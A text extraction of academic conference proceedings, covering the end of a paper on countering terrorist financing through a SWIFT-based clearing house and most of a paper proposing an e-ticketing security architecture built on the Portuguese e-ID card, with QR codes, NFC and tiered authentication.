Goal: Assign<strong>in</strong>g responsibilities. The detailed model described above will be followed by a list of law<br />
enforcement agencies, government bodies, and bank<strong>in</strong>g experts responsible for each operational stage,<br />
<strong>in</strong>clud<strong>in</strong>g the gather<strong>in</strong>g of <strong>in</strong>formation and foil<strong>in</strong>g efforts.<br />
35
Alexander Bligh<br />
Characterization of personnel: Anti-terrorism experts, exist<strong>in</strong>g agencies from NATO countries, and<br />
political science personnel specializ<strong>in</strong>g <strong>in</strong> public adm<strong>in</strong>istration, together with legal and f<strong>in</strong>ancial experts<br />
who carefully follow the legality of each of the abovementioned efforts.<br />
Methodology: Collect<strong>in</strong>g data from exist<strong>in</strong>g literature and <strong>in</strong>terviews with convicted terrorists and<br />
members of governmental agencies <strong>in</strong> NATO and SWIFT member countries. All anti-terrorism bodies<br />
together with their assigned and actual responsibilities will be listed, and their current contribution to the<br />
effort assessed accord<strong>in</strong>g to their compatibility with other agencies with<strong>in</strong> NATO. This body of evidence<br />
will be compared and comb<strong>in</strong>ed with the model <strong>in</strong> DIMENSION ONE.<br />
End product: A model for the division of responsibilities, reflect<strong>in</strong>g the current needs of the anti-terrorism<br />
and f<strong>in</strong>ancial agencies, and a model of <strong>in</strong>formation-gather<strong>in</strong>g <strong>in</strong>clud<strong>in</strong>g targets, methods, sources, as well<br />
as a dynamic list of <strong>in</strong>formation priorities.<br />
Dimension three:<br />
Goal: Provid<strong>in</strong>g the legal <strong>in</strong>frastructure for the anti-terrorism effort and its f<strong>in</strong>ancial dimension.<br />
Characterization of personnel: Jo<strong>in</strong>t teams of legal, bank<strong>in</strong>g and anti-terrorism experts will collect all<br />
pert<strong>in</strong>ent pieces of legislation, laws and regulations from NATO members and SWIFT countries.<br />
Methodology: The efforts, described <strong>in</strong> dimensions one and two, need to be accompanied by legislation<br />
relat<strong>in</strong>g to civil and human rights <strong>in</strong> the countries <strong>in</strong>volved. This will provide the legal basis for any action<br />
taken, from data collection to the seizure of people and material.<br />
End product: A legal manual for all anti-terrorism elements, detail<strong>in</strong>g the legal environment <strong>in</strong> which they<br />
operate. The manual will elaborate on the steps that can be taken, country-by-country, and the <strong>in</strong>stances<br />
<strong>in</strong> which legal advice is necessary.<br />
Together, these three dimensions will produce a f<strong>in</strong>ancial anti-terrorism toolbox consist<strong>in</strong>g of:<br />
A terror manual.<br />
An <strong>in</strong>formation-gather<strong>in</strong>g model (<strong>in</strong>clud<strong>in</strong>g: responsible bodies, a generic list of essential <strong>in</strong>formation,<br />
term<strong>in</strong>ology)<br />
A legal handbook <strong>in</strong>clud<strong>in</strong>g the breakdown of the legal basis for operations country-by-country.<br />
5. Conclusion<br />
The approach proposed above envisions the establishment, by SWIFT and/or a consortium of other<br />
f<strong>in</strong>ancial <strong>in</strong>stitutions, of a 24/7 central clear<strong>in</strong>g house of suspected and pert<strong>in</strong>ent f<strong>in</strong>ancial data to be<br />
comb<strong>in</strong>ed with non-f<strong>in</strong>ancial data, supplied by other bodies. The creation of such a body would not<br />
resolve the issue of f<strong>in</strong>anc<strong>in</strong>g terror. However, it would significantly enhance the likelihood that a common<br />
language of experts would be found, and some contribution could be made towards fight<strong>in</strong>g the f<strong>in</strong>anc<strong>in</strong>g<br />
of terrorism and O/C. View<strong>in</strong>g this method as another layer <strong>in</strong> counter<strong>in</strong>g terrorism may also <strong>in</strong>crease<br />
<strong>in</strong>ternational and <strong>in</strong>ter-agency dialogue and exchange of <strong>in</strong>formation without the l<strong>in</strong>ger<strong>in</strong>g misgiv<strong>in</strong>gs that<br />
this might compromise national assets.<br />
Acknowledgments<br />
Prof. Bligh of the Ariel University Center, Israel, wishes to thank the Shcusterman family fund and the<br />
University of Notre Dame for allow<strong>in</strong>g him the time and resources to carry out this study.<br />
References<br />
Abuza, Z. (2003) “Fund<strong>in</strong>g Terrorism <strong>in</strong> Southeast Asia: The F<strong>in</strong>ancial Network of Al Qaeda and Jemaah Islamiya”,<br />
Contemporary Southeast Asia: A Journal of International & Strategic Affairs, vol. 25, August, pp. 169-199.<br />
Askari, R. (2011) “Non-resident Bangladeshi: The story of the goose that lays golden eggs”, The F<strong>in</strong>ancial Express<br />
(Dhaka), 19 January.<br />
Ballard, M. (2006) US violated world's privacy with secret SWIFT checks [onl<strong>in</strong>e], Available at:<br />
http://www.theregister.co.uk/2006/09/28/swift_us_privacy_violation<br />
Bligh, A. (2006) “An Analytical Model of Anti-Terror Cross Border Cooperation", <strong>in</strong> Kempf, W. And Peleg, S. (ed.)<br />
Fight<strong>in</strong>g Terrorism <strong>in</strong> the Liberal State; An Integrated Model of Research, Intelligence and International Law;<br />
Volume 9 NATO <strong>Security</strong> through Science Series: Human and Societal Dynamics, The Netherlands: IOS Press.<br />
36
Alexander Bligh<br />
Bloodgood, E. & Tremblay-Boire, J. (2011) “International NGOs and National Regulation <strong>in</strong> an Age of Terrorism”,<br />
Voluntas: International Journal of Voluntary and Nonprofit Organizations, Vol. 22, No. 1, March, pp. 142-173.<br />
Casey, J. (2007) "Deal<strong>in</strong>g with Hawala: <strong>in</strong>formal f<strong>in</strong>ancial centers <strong>in</strong> the ethnic community", FBI Law Enforcement<br />
Bullet<strong>in</strong>, no. 2, February, p. 12.<br />
Fair Disclosure Wire (2007) “MoneyGram International 2007 Analyst Day - F<strong>in</strong>al” [onl<strong>in</strong>e], available at:<br />
http://www.accessmylibrary.com/coms2/summary_0286-29974121_ITM<br />
Freedman, M. (2005) "The Invisible Bankers”, Forbes, 17 October, pp. 94-104.<br />
Global F<strong>in</strong>ance (2011) “Look<strong>in</strong>g Ahead” [onl<strong>in</strong>e], available at: http://www.gfmag.com/archives/133/10949-sponsoredroundtable-cash-management.html#axzz1FQmhHwI0<br />
Hudson R. (2003, revised 2010) “Terrorist And Organized Crime Groups In The Tri-Border Area (TBA) Of South<br />
America; A Report Prepared by the Federal Research Division, Library of Congress under an Interagency<br />
Agreement with the Crime and Narcotics Center Director of Central Intelligence. Federal Research Division<br />
Library of Congress Wash<strong>in</strong>gton” [onl<strong>in</strong>e], available at: http://www.loc.gov/rr/frd/pdf-files/TerrOrgCrime_TBA.pdf<br />
Olson, D. (2007) "F<strong>in</strong>anc<strong>in</strong>g Terror", FBI Law Enforcement Bullet<strong>in</strong>, no. 2, February, pp. 1-5<br />
Razavy, M. (2005) "Hawala: An underground haven for terrorists or social phenomenon?", Crime, Law & Social<br />
Change, vol. 44, no. 3, October, pp. 277-299.<br />
Shields, P. (2005) "The ‘Information Revolution’, F<strong>in</strong>ancial Globalization, State Power and Money Launder<strong>in</strong>g",<br />
Journal of International Communication, vol. 11, no. 1, pp. 15-39<br />
"Wired Efficiency", Treasury & Risk (1 June 2007), pp.15-16<br />
37
A Secure Architecture for Electronic Ticket<strong>in</strong>g Based on the<br />
Portuguese e-ID Card<br />
Paul Crocker 1, 2 and Vasco Nicolau 1<br />
1<br />
University of Beira Interior 6201-001 Covilhã, Portugal<br />
2<br />
Institute of Telecommunications, Covilhã, Portugal<br />
crocker@di.ubi.pt<br />
m2207@ubi.pt<br />
Abstract: The current state of the art for electronic ticket<strong>in</strong>g is based around a mobile concept, where the diverse<br />
players <strong>in</strong>volved, clients, payment agents, mobile operators and merchants, often have different and compet<strong>in</strong>g<br />
needs <strong>in</strong> terms of technology and very often security. In this paper we shall discuss and analyse the security of<br />
current electronic ticket<strong>in</strong>g, payment, delivery and authenticat<strong>in</strong>g systems and show that today’s new payment<br />
system has the mobile operator as a central player and the mobile phone, giv<strong>in</strong>g its undisputed role <strong>in</strong> today’s<br />
society, as a central agent. We shall then propose and describe a new <strong>in</strong>novative architecture for electronic ticket<strong>in</strong>g<br />
that makes use of the Portuguese national electronic identity (e-ID) card as a fundamental aspect of the security of<br />
the ticket<strong>in</strong>g architecture. This architecture is comb<strong>in</strong>ed with the latest technologies such as NFC enabled mobile<br />
handsets. We shall describe the potentialities of our architecture to store electronic tickets, <strong>in</strong> the form of QR-Codes,<br />
<strong>in</strong> a secure way. We shall also how the proposed architecture permits flexible authenticat<strong>in</strong>g scenarios for the<br />
eTickets based on the different levels of security which may be required for any given scenario. Different scenarios<br />
range from low level and rapid authentication for mass transit system to the stronger authentication level required for<br />
the delivery of high value items and to the str<strong>in</strong>gent security required at border controls. The flexibility and secure<br />
authentication is made available due to the cryptographic PIN and biometric authentication available on national and<br />
<strong>in</strong> particular Portuguese National e-ID cards.<br />
Keywords: electronic ticket<strong>in</strong>g, identification cards, security, mobile authentication, cryptographic signatures<br />
1. Introduction<br />
The cont<strong>in</strong>u<strong>in</strong>g evolution of Information and Communication Technologies (ICT’s) has enabled the<br />
cont<strong>in</strong>u<strong>in</strong>g take up of eCommerce services and products, the growth <strong>in</strong> such services has been driven by<br />
the Internet however new technologies are also driv<strong>in</strong>g new products, services and opportunities based<br />
around a mobile and ubiquitous concept. The Internet has however often been associated with<br />
cybercrime, cyberwarfare and general crim<strong>in</strong>al behaviour, <strong>in</strong> fact the onl<strong>in</strong>e world is subject to the same<br />
security and privacy concerns of the real world and it is therefore <strong>in</strong>creas<strong>in</strong>gly important to guarantee our<br />
security and our privacy <strong>in</strong> the <strong>in</strong>formation society. This is especially true <strong>in</strong> the context of onl<strong>in</strong>e<br />
electronic sales and transactions for goods and services with the move away from paper documentation<br />
for ticket<strong>in</strong>g, <strong>in</strong>voic<strong>in</strong>g etc. and towards the <strong>in</strong>creas<strong>in</strong>g use of electronic documentation.<br />
The new ICT’s enable the ease, speed and automation of operations that modern society requires.<br />
Unfortunately a consequence of this change has been a sensation of unreliability and <strong>in</strong>security on the<br />
part of the general public. Tak<strong>in</strong>g <strong>in</strong>to account that security is an essential element of any system we<br />
shall propose <strong>in</strong> detail a new comput<strong>in</strong>g architecture for electronic ticket<strong>in</strong>g which covers the entire tickets<br />
lifecycle, namely the book<strong>in</strong>g, purchas<strong>in</strong>g, authentication and validation of the tickets. This <strong>in</strong>novative<br />
architecture makes use of national electronic identity (e-ID) cards as a fundamental aspect of the security<br />
of the ticket<strong>in</strong>g architecture. Technologies used <strong>in</strong>clude Near Filed Communication (NFC), the Global<br />
System for Mobile (GSM) communications, the Quick Response 2-D Bar Code (QR-Code) format,<br />
Biometrics and Mobile Comput<strong>in</strong>g with the overall aim of us<strong>in</strong>g the best characteristics of each<br />
technology and design<strong>in</strong>g and prototyp<strong>in</strong>g a safe, secure, flexible, <strong>in</strong>novative and commercially viable<br />
architecture. One of the pr<strong>in</strong>cipal contributions of this article is the way that the Citizens electronic<br />
Identification (e-ID) Card is <strong>in</strong>tegrated <strong>in</strong>to the security layer of the proposed architecture. The ma<strong>in</strong> use<br />
of the Citizens Card is to strengthen the ticket<strong>in</strong>g system from the viewpo<strong>in</strong>t of personal identification and<br />
authentication. A resilient system, associated with the digital identity of citizens throughout the life cycle<br />
of tickets will be described. In order to achieve this we make use of a new Middleware for the<br />
(Portuguese) Citizens Card that has been developed by the authors (Crocker, de Sousa, & Nicolau,<br />
2010).<br />
The rest of this paper is organized as follows: In section2 a brief review of the state of the art <strong>in</strong><br />
eTicket<strong>in</strong>g is given. Section 3 discusses the use of e-id cards. Section 4 describes <strong>in</strong> detail the eTicket<strong>in</strong>g<br />
architecture and <strong>in</strong> section 5 the secure authentication mechanisms at the merchant are expla<strong>in</strong>ed. This<br />
38
Paul Crocker and Vasco Nicolau<br />
is then followed <strong>in</strong> section 6 by an analysis of the proposed architecture. The f<strong>in</strong>al Section presents the<br />
conclusions.<br />
2. eTicket<strong>in</strong>g<br />
Today the vast majority of users store personal <strong>in</strong>formation, such as notes, calendars, photographs,<br />
contacts and even <strong>in</strong>formation about credit cards and passwords on their mobile devices. Given the<br />
undoubted importance of the mobile society, this trend will most likely cont<strong>in</strong>ue and <strong>in</strong> the near future, the<br />
device will also be used to pay for goods and services, contact with government entities or even to cast<br />
ones vote. As a consequence of this evolution, mobile phones are seen by citizens as <strong>in</strong>dispensable<br />
devices, bearers of a personal identity that is <strong>in</strong> constant mobility, connectivity and updated with the latest<br />
<strong>in</strong>formation and services.<br />
Mobile devices are be<strong>in</strong>g used to transport tickets, pay for services us<strong>in</strong>g the mobile Internet and to<br />
access bank<strong>in</strong>g operations. Examples from Portugal are MB-Phone (SIBS 2010) for bank<strong>in</strong>g operations<br />
and Movensis (Exame Informática 2010) for vend<strong>in</strong>g mach<strong>in</strong>es. In terms of security there is always the<br />
difficult task of remotely authenticat<strong>in</strong>g users and provid<strong>in</strong>g an adequate level of acceptance and nonrepudiation<br />
of transactions. This is due largely to the fact that the overwhelm<strong>in</strong>g majority of current<br />
solutions are based on <strong>in</strong>frastructures ma<strong>in</strong>ta<strong>in</strong>ed by network operators or f<strong>in</strong>ancial <strong>in</strong>stitutions (Oberthur<br />
2009). Today’s payment system consists of several actors, traditionally the banks, the consumers and the<br />
merchants. However the effect of the mobile has to br<strong>in</strong>g a new player <strong>in</strong>to the system, notably the<br />
mobile phone operator as illustrated below <strong>in</strong> Fig 1.<br />
Figure 1: Illustration of the new payment system<br />
2.1 Examples of current electronic payment and ticket<strong>in</strong>g systems<br />
Here we describe some typical services.<br />
M-Pesa – a mobile-phone based money transfer service. With M-Pesa and a mobile phone it’s<br />
possible to transfer money and to pay for purchases from a merchant. Payments are processed via a<br />
simple transfer from the balance of the citizens mobile to a merchants account via SMS (Hughes, N<br />
and Lonie, S 2009).<br />
Movensis – the solution consists <strong>in</strong> the simple use of mobile phones to transfer money from a<br />
personal account to the account of the operator of a vend<strong>in</strong>g mach<strong>in</strong>e (merchant) <strong>in</strong> order to obta<strong>in</strong> a<br />
product. The customer has to first access the application on the phone with a PIN physically identify<br />
the serial number of the mach<strong>in</strong>e and then send an SMS with this identification plus the amount to be<br />
spent. This process allows the bank to transfer money from the clients account to the merchants<br />
account, <strong>in</strong> the case of a vend<strong>in</strong>g mach<strong>in</strong>e the credit available appears on the mach<strong>in</strong>e itself.<br />
39
Paul Crocker and Vasco Nicolau<br />
Sport Lisboa e Benfica (Football Ticket) – the solution is to buy a ticket for a football game us<strong>in</strong>g the<br />
clubs web site (us<strong>in</strong>g a payment agent such as VISA). The clients’ mobile phone then receives the<br />
ticket <strong>in</strong> the form of a QR-Code with their credentials. The validation stage is simply to validate the<br />
QR-Code received when read at a term<strong>in</strong>al at the football stadium.<br />
Portuguese Tra<strong>in</strong> Company (CP) (Tra<strong>in</strong> Ticket) – At the onl<strong>in</strong>e site of the Merchant the client checks<br />
tra<strong>in</strong> and seat availability and pre-pays for the trip (us<strong>in</strong>g a payment agent, VISA). The customer then<br />
receives a clear text SMS with the ticket on their phone, this is called a “netTicket”. On the tra<strong>in</strong> the<br />
ticket <strong>in</strong>spector authenticates the validity of the “netTicket” and the client by simply <strong>in</strong>spect<strong>in</strong>g the<br />
SMS and possibly verify<strong>in</strong>g the ticket (not the holder) us<strong>in</strong>g the CP back office IT system.<br />
2.2 <strong>Security</strong> concerns<br />
Based on the systems described previously and others some general security concerns can be identified.<br />
Difficulties <strong>in</strong> retriev<strong>in</strong>g the ticket due to theft or loss of the phone or lack of battery power.<br />
The need to enter an application specific PIN to validate an operation is a concern pr<strong>in</strong>cipally<br />
because people are reluctant to learn more than one PIN and often keep the PIN on (or near) the<br />
phone itself.<br />
The ticket is usually stored <strong>in</strong> clear text on the phone (SMS/QR-Code) and it is therefore a trivial<br />
matter for an attacker to know where to use it.<br />
The difficulty <strong>in</strong> ensur<strong>in</strong>g that the holder of the ticket is <strong>in</strong>deed the rightful owner of the ticket.<br />
Mobile phones are subject to the same type of attacks and vulnerabilities (viruses, trojans, phish<strong>in</strong>g<br />
etc.) as traditional computers. Hence one must consider that mobile devices are untrustworthy<br />
comput<strong>in</strong>g devices (Enisa 2008). One consequence of this is the possibility of (undetected or<br />
otherwise) theft of the ticket.<br />
Fraudulent Copies of the ticket on the mobile phone are also a concern.<br />
3. e-ID Cards <strong>in</strong> society<br />
Personal identification documents are undergo<strong>in</strong>g changes all around the world, most notably <strong>in</strong> the<br />
transformation of conventional paper documents to an e-ID format similar to modern electronic credit<br />
cards (smart cards). The success of a number of countries <strong>in</strong> the adoption of e-ID documents is due to<br />
various factors, for example, the high level of security that such a document offers (resistance to<br />
penetration attacks, forgeries etc.). Another important aspect of their success is the ability of e-ID<br />
documents to <strong>in</strong>tegrate with electronic services and the <strong>in</strong>teroperability between national e-ID cards, see<br />
for <strong>in</strong>stance the STORK project to establish a European e-ID Interoperability (Leenes, R 2009).<br />
Electronic documents are seen as safe, simplify the day-to-day lives and at the same time reduce costs<br />
<strong>in</strong> operations to control fraud. National security and defense entities have therefore welcomed their<br />
implementation due to the simplification it provides and the services that are provided such as identity<br />
authentication, secure electronic document sign<strong>in</strong>g and enabl<strong>in</strong>g access to governmental services such<br />
as tax. There are also many examples of new <strong>in</strong>novative services be<strong>in</strong>g associated with such cards, two<br />
examples are the use of the national e-ID card <strong>in</strong> the Estonian transport system and the Kids-ID system<br />
<strong>in</strong> Belgium for safe logon to onl<strong>in</strong>e chat rooms (Eched, Y, Billiaert, E & Veyret E 2009).<br />
3.1 Functionalities of the Portuguese e-ID card<br />
In this section only key features associated with the Portuguese Citizen Card (CC) will be stated, more<br />
details can be found at the e-ID portal (www.cartaodecidadao.pt).<br />
The CC is a Java smart card. The on-card chip conta<strong>in</strong>s the citizens’ personnel <strong>in</strong>formation, a private<br />
writable <strong>in</strong>formation space (1Kbyte) and a biometric f<strong>in</strong>gerpr<strong>in</strong>t template and cryptographic keys and<br />
digital certificates of the Portuguese Justice M<strong>in</strong>istry Public Key Infrastructure. The relevant <strong>in</strong>formation<br />
on the card is accessed by java applets (Rankl 2007) as shown <strong>in</strong> Fig 2. The card conta<strong>in</strong>s three<br />
Personnel Identification Numbers (PINs), mechanisms for alter<strong>in</strong>g the PINs and <strong>in</strong>ternal cryptographic<br />
process<strong>in</strong>g. It is combatable with multi-channel card readers for authentication and digital signatures (IAS<br />
applet), permits the generation of one-time passwords (OTP applet) and executes Match-on-Card (MoC<br />
applet) biometric validation of f<strong>in</strong>gerpr<strong>in</strong>ts.<br />
40
Paul Crocker and Vasco Nicolau<br />
Figure 2: Diagram of applets <strong>in</strong>stalled <strong>in</strong> the Portuguese Citizen Card<br />
The next section describes <strong>in</strong> detail the proposed architecture for secure ticket<strong>in</strong>g that uses an e-ID card<br />
as an <strong>in</strong>tegral part. The result<strong>in</strong>g system is not <strong>in</strong>tended as a competitor of systems developed by large<br />
organizations but can be seen as a security layer which could be <strong>in</strong>tegrated <strong>in</strong>to exist<strong>in</strong>g ticket<strong>in</strong>g<br />
systems.<br />
4. Secure eTicket<strong>in</strong>g architecture<br />
In this section the requirements that the security platform should offer are first def<strong>in</strong>ed, a brief description<br />
of the <strong>in</strong>formation flow <strong>in</strong> the system is given and the use of the e-ID <strong>in</strong> the security platform is described.<br />
4.1 Requirements<br />
Based on the security concerns of current electronic payment systems we conclude that depend<strong>in</strong>g on<br />
the type of system and its target audience different forms of validation/authentication of the end user and<br />
ticket are required. This requires the security layer to be flexible to the po<strong>in</strong>t where it is possible to<br />
support different authentication environments. For example, purchas<strong>in</strong>g and subsequent validation of a<br />
bus ticket is quite different than validat<strong>in</strong>g a ticket that permits the pick up of a newly purchased car. The<br />
security level should also be flexible <strong>in</strong> situations where fraud has been detected and it is necessary to<br />
dynamically <strong>in</strong>crease the level of authentication as was the case at U2 concerts <strong>in</strong> Coimbra, Portugal<br />
(2010) and Boston, USA (2005) – there needs to be a mechanism of digitally provid<strong>in</strong>g proof that the<br />
holder of the ticket is the owner of the ticket and that the ticket is valid.<br />
Three levels of authentication have therefore been def<strong>in</strong>ed:<br />
Weak - cases where a fast authentication of the ticket (e.g. public transport) is required<br />
Strong - situations where it is necessary to ensure maximum safety for both the merchant and the<br />
client. For <strong>in</strong>stance where it’s necessary to authenticate the client as the valid owner of the ticker via<br />
his e-ID, examples of such situations are: when receiv<strong>in</strong>g high value goods, when receiv<strong>in</strong>g<br />
prescription drugs at pharmacies, at high risk sport<strong>in</strong>g where it’s necessary to exclude certa<strong>in</strong><br />
<strong>in</strong>dividuals and at musical events <strong>in</strong> order to avoid ticket fraud.<br />
Extra Strong - specific cases where it is necessary to provide additional guarantees other than the<br />
authenticity of the ticket holder's e-ID card– (e.g. biometric authentication at airports and borders).<br />
With respect to the <strong>in</strong>formation flow between all the players it is desirable to use the best available<br />
technologies. QR-Code and NFC technology were chosen for the transport and communication of the<br />
electronic tickets as these technologies are particularly well suited to mobile devices.<br />
F<strong>in</strong>ally it was decided to make use of a Payment Agent as this resolves problems concern<strong>in</strong>g payments<br />
and is quite a common procedure. The payment agent can of course be any available onl<strong>in</strong>e payment<br />
technology company.<br />
41
4.2 General overview<br />
Paul Crocker and Vasco Nicolau<br />
The follow<strong>in</strong>g figure, Fig 3, shows the proposed ticket life cycle. The process starts with the purchase of<br />
some good or service via an onl<strong>in</strong>e web site/shop. The client receives an electronic SMS message with<br />
the payment reference (and optionally an email with a copy of the respective data). The client then<br />
proceeds to a payment agent (for example PayShop, http://www.payshop.pt/) where the client provides<br />
the payment reference <strong>in</strong>formation on his handset via an electronic channel (NFC) or via a simple visual<br />
read<strong>in</strong>g. The purchase may <strong>in</strong> fact be made directly at the payment agent, <strong>in</strong> which case there is no need<br />
to send the SMS with the reservation code to the client.<br />
The payment agent is then responsible for construct<strong>in</strong>g the secure eTicket. This process requires the<br />
client to provide his e-ID card and to authenticate himself. After the reference has been paid for the<br />
eTicket, a QR-Code, is then delivered to the client – either by send<strong>in</strong>g a MMS or directly us<strong>in</strong>g NFC. The<br />
data is also sent to the Merchant for use <strong>in</strong> the validation process. F<strong>in</strong>ally at the Merchant the client will<br />
authenticate himself, the merchant will validate the eTicket and authenticate the client and then deliver<br />
the goods/services.<br />
Figure 3: Architecture and life cycle of the secure eTicket<br />
4.2.1 Onl<strong>in</strong>e website<br />
This is designed as a web portal, Fig 4, with associated services, back office data bases, email and GSM<br />
server (for send<strong>in</strong>g SMS messages) available via web services for maximum flexibility.<br />
Figure 4: WebShop platform<br />
42
4.2.2 PaymentaAgent<br />
Paul Crocker and Vasco Nicolau<br />
At the payment agent, Fig5, the client presents the payment reference (the SMS on his handset) us<strong>in</strong>g for<br />
<strong>in</strong>stance NFC to transmit the reference details to the payment agent, effects payment and <strong>in</strong> return<br />
receives the eTicket. The payment agent needs a card reader (to read the clients e-ID card) and a<br />
cryptographic unit for calculat<strong>in</strong>g checksums and for digitally sign<strong>in</strong>g the ticket. The payment agent also<br />
needs access to the Web Services described <strong>in</strong> the previous section to access the payment reference<br />
details (back office data bases) concern<strong>in</strong>g the particular event/service and also to access the GSM<br />
modem <strong>in</strong> order to send the eTicket via MMS (alternatively from the payment agent to the client us<strong>in</strong>g<br />
NFC).<br />
Figure 5: Payment agent platform<br />
4.2.3 Merchant<br />
The merchant module, Fig6, concludes the tickets lifecycle. This is the po<strong>in</strong>t where the client receives the<br />
goods or services purchased, for <strong>in</strong>stance access to a sport<strong>in</strong>g event, pick up of goods purchased onl<strong>in</strong>e<br />
at a warehouse or shop, ticket validation on a transit system etc. At this po<strong>in</strong>t the Merchant needs to<br />
guarantee the authenticity of the eTicket and the validity of the client hold<strong>in</strong>g it. In order to have a flexible<br />
system not reliant on one particular technology the solution proposed uses various technologies. To<br />
authenticate the client the Merchant obta<strong>in</strong>s the ticket held on the clients’ phone us<strong>in</strong>g for example<br />
wireless communication, NFC or an optical read<strong>in</strong>g us<strong>in</strong>g a bar code reader (or even a simple Web-<br />
Cam). The smart card reader is necessary <strong>in</strong> order to obta<strong>in</strong> the authentication and or biometric<br />
credentials of the client.<br />
Figure 6: Merchant validation<br />
43
4.3 <strong>Security</strong> layer<br />
Paul Crocker and Vasco Nicolau<br />
The proposed architecture is <strong>in</strong> some cases similar to current ticket<strong>in</strong>g systems, these similarities are<br />
more obvious <strong>in</strong> relation to the <strong>in</strong>formation system. However, the proposed architecture makes the<br />
<strong>in</strong>terconnection of multiple technologies such as NFC, QR-Code and e-ID cards that <strong>in</strong> conjunction with<br />
the mobile phone results <strong>in</strong> an <strong>in</strong>novative system that is practical, secure and functional, Fig7. Although<br />
at the technological level the system is <strong>in</strong>novative, what stands out <strong>in</strong> comparison to all the other systems<br />
is the security layer. That is, while similar systems (e.g. public transport Ticket<strong>in</strong>g-OTLIS) centralize the<br />
security of the system <strong>in</strong> technology (e.g. RFID cards) or Back Office Systems, the whole security of the<br />
system presented is based on the security credentials of the CC.<br />
Figure 7: Ticket-ID: Secure eTicket<strong>in</strong>g<br />
4.3.1 <strong>Security</strong> layer<br />
As stated earlier the pay<strong>in</strong>g agent is responsible for construct<strong>in</strong>g the ticket. The exact process of<br />
construct<strong>in</strong>g the ticket is illustrated <strong>in</strong> Fig8.<br />
Figure 8: The process of eTicket construction<br />
1. In the first step the client at the payment agent presents his reference number, received via SMS and<br />
held on his mobile phone (also sent by email). The system will then read this data (via NFC).<br />
2. A ticket <strong>in</strong> the context of the system is composed of several elements, <strong>in</strong>clud<strong>in</strong>g the data result<strong>in</strong>g from<br />
the payment and details of the event as shown below <strong>in</strong> Fig9. After construct<strong>in</strong>g this ticket the system<br />
applies a cryptographic Hash function (MD5). The derived HASH is given the name eTicket.<br />
3. The credentials of the personal identity of the citizen are then associated with the eTicket by digitally<br />
sign<strong>in</strong>g the eTicket, this is done on the e-ID card us<strong>in</strong>g (<strong>in</strong> the Portuguese case) the algorithms SHA1<br />
44
Paul Crocker and Vasco Nicolau<br />
with RSA [NIST 2009]. The process of sign<strong>in</strong>g the eTicket implies that the user enters their digital<br />
signature PIN <strong>in</strong> order to confirm the operation.<br />
Figure 9: The eTicket attributes before apply<strong>in</strong>g the hash function<br />
4. The result of the previous cryptographic operation is a digital signature of the eTicket, which is given<br />
the name of “Ticket-Control”. At this stage, the Ticket-Control enables one to identify unequivocally the<br />
owner of the ticket.<br />
5. After construct<strong>in</strong>g the Ticket-Control three parallel operations are made (i) the Ticket-Control is stored<br />
<strong>in</strong> the Merchants back office, (ii) the QR-Code that conta<strong>in</strong>s a digital representation of the Ticket-Control<br />
is constructed and, (iii) most crucially and importantly the eTicket is divided <strong>in</strong>to two parts of differ<strong>in</strong>g<br />
sizes:<br />
The smallest part is the first 4 bytes (see Fig10) of the eTicket (the hash). To this is added a reference<br />
tag to identify this data as orig<strong>in</strong>at<strong>in</strong>g from a secure eTicket and a simple 10byte checksum (see Fig 11).<br />
The importance of the identify<strong>in</strong>g tag is that it enables the customer to track and identify the ticket on the<br />
national ID card. The checksum is needed to elim<strong>in</strong>ate any data errors and ambiguities that may arise <strong>in</strong><br />
the data transmission. This data is then written onto the e-ID card. In the case of the Portuguese card<br />
there is a maximum of 1Kbyte of data that the card holder may read/write.<br />
Figure 10: The construction of the eTicket<br />
45
Paul Crocker and Vasco Nicolau<br />
The second larger part is the 12 byes (see Fig10). This data is also encapsulated with a Tag and<br />
checksum and sent to the merchant. This data will be necessary <strong>in</strong> order to perform a strong<br />
authentication of the client and eTicket.<br />
Figure 11: Example of the data held on the Portuguese e-ID<br />
6. The f<strong>in</strong>al stage is to send the QR-Code conta<strong>in</strong><strong>in</strong>g the Ticket-Control to the client’s mobile, either by<br />
send<strong>in</strong>g a MMS or via NFC.<br />
5. Secure authentication at the merchant<br />
The f<strong>in</strong>al part of our system is the act of authentication of the client and the Merchant. This is the po<strong>in</strong>t<br />
where the client receives the goods or services that have been paid for. As expla<strong>in</strong>ed <strong>in</strong> section 4.1, three<br />
different authentication scenarios have been def<strong>in</strong>ed, their implementation is now described.<br />
5.1 The weak authentication process<br />
The weak authentication process consists of obta<strong>in</strong><strong>in</strong>g the QR-Code via one of three possible<br />
technologies on the merchant's side. This can be decoded and the Ticket-Control obta<strong>in</strong>ed. In this simple<br />
case all that is necessary is that the Merchant compares this Ticket-Control to the one <strong>in</strong> the Merchants<br />
back office <strong>in</strong>formation system, see Fig12. Weak authentication is advantageous <strong>in</strong> scenarios where<br />
ticket validation needs to be rapid. In these cases the value of the ticket is usually limited and as such it is<br />
not necessary to have a demand<strong>in</strong>g security framework. For example, access to public transportation or<br />
entrance at concerts, theatre and c<strong>in</strong>ema that do not require high security.<br />
Figure 12: Weak validation process<br />
46
5.2 Strong authentication process<br />
Paul Crocker and Vasco Nicolau<br />
As <strong>in</strong> the weak validation process the first step is to obta<strong>in</strong> and decode the MMS <strong>in</strong> order to obta<strong>in</strong> the<br />
Ticket-Control. The next step is to validate the Ticket-Control, Fig13, but <strong>in</strong> this case we wish to provide<br />
proof that the client is <strong>in</strong>deed the purchaser of the goods or services be<strong>in</strong>g requested. This is established<br />
us<strong>in</strong>g the follow<strong>in</strong>g procedure.<br />
Figure 13: Strong authentication process<br />
1. The merchant has the Ticket-Control plus ¾ of the orig<strong>in</strong>al eTicket.<br />
2. The client <strong>in</strong>troduces his e-ID card <strong>in</strong>to the Merchants card reader to obta<strong>in</strong> the rema<strong>in</strong><strong>in</strong>g ¼. This way<br />
the Merchant is able to obta<strong>in</strong> the complete eTicket.<br />
3. The merchant then requests that the client signs the eTicket us<strong>in</strong>g his PIN thereby re-creat<strong>in</strong>g the<br />
Ticket-Control.<br />
4. At this po<strong>in</strong>t it’s possible for the Merchant to compare the Ticket-Control that he has just recreated with<br />
the Ticket-Control <strong>in</strong> his back office <strong>in</strong>formation system.<br />
5. In case it should be necessary the merchant can additionally request the Ticket-Control the client<br />
received on his mobile phone, thereby prevent<strong>in</strong>g and problems associated with theft of the e-ID card. In<br />
this case if the three Ticket-Controls are equal then the ticket is valid.<br />
5.3 Strong biometric authentication process<br />
In sensitive environments, for example at airports, it may also be necessary to authenticate biometrically<br />
the card holder. In this case, apart from verify<strong>in</strong>g the Ticket-Control, it is also required to identify the<br />
citizen who presents the e-ID card. For this the biometric f<strong>in</strong>gerpr<strong>in</strong>t validation (Match on Card)<br />
